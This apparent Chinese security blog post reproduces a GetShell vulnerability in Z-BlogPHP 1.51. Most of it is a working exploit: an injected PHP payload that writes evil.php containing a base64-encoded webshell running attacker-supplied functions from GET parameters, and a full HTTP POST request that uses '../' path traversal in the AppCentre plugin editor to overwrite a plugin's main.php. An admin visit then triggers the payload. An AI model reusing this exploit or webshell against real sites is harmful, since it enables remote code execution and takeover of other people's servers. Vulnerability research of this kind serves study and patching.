zblog1.51 php版GetShell漏洞

时间：2018-04-28 07:20:54人气：次作者：本站作者我要评论

GetShell漏洞的分析

漏洞复现

构造模板文件zb_users/plugin/AppCentre/tpl/main.html利用方式的paylod:

balabal')){}$f=fopen('evil.php','a');fwrite($f,base64_decode('PD9waHAgJF9HRVRbJ2Z1bmMnXSgkX0dFVFsnY21kJ10pOz8+'));fclose($f);?>

因为\zb_users\plugin\AppCentre\plugin_edit.php文件中的60行中存在目录跳转的漏洞。

所以可以使用../进行目录跳转然后将写入的文件替换zb_users/plugin/Totoro/main.php文件，进行如下请求写入恶意代码，然后进行替换zb_users/plugin/Totoro/main.php文件。

POST /zb_users/plugin/AppCentre/plugin_edit.php HTTP/1.1
Host: 192.168.112.136
Content-Length: 548
Cache-Control: max-age=0
Origin: http://192.168.112.136

Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.112.136/zb_users/plugin/AppCentre/plugin_edit.phpaaa

Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: username=zblog; password=321c7793b025c200fcf087a437cf2b24; addinfo=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22zblog%22%7D; timezone=8
Connection: close
 
 
app_id=balabal')){}$f%3dfopen('evil.php','a')%3bfwrite($f,base64_decode('PD9waHAgJF9HRVRbJ2Z1bmMnXSgkX0dFVFsnY21kJ10pOz8%2b'))%3bfclose($f)%3b%3f>&app_name=1&app_url=2&app_note=3&app_adapted=151740&app_version=1.0&app_pubdate=2018-04-19&app_modified=2018-04-19&app_author_name=zblog&app_author_email=null%40null.com&app_author_url=&app_path=../Totoro/main.php&app_include=include.php&app_level=1&app_phpver=5.2&app_price=0&app_advanced_dependency=&app_advanced_conflict=&app_advanced_rewritefunctions=&app_advanced_existsfunctions=&app_description=

当管理员访评论管理->Totoro设置的时候(http://192.168.112.136/zb_users/plugin/Totoro/main.php)的时候便会触发脚本生成evil.php的恶意文件。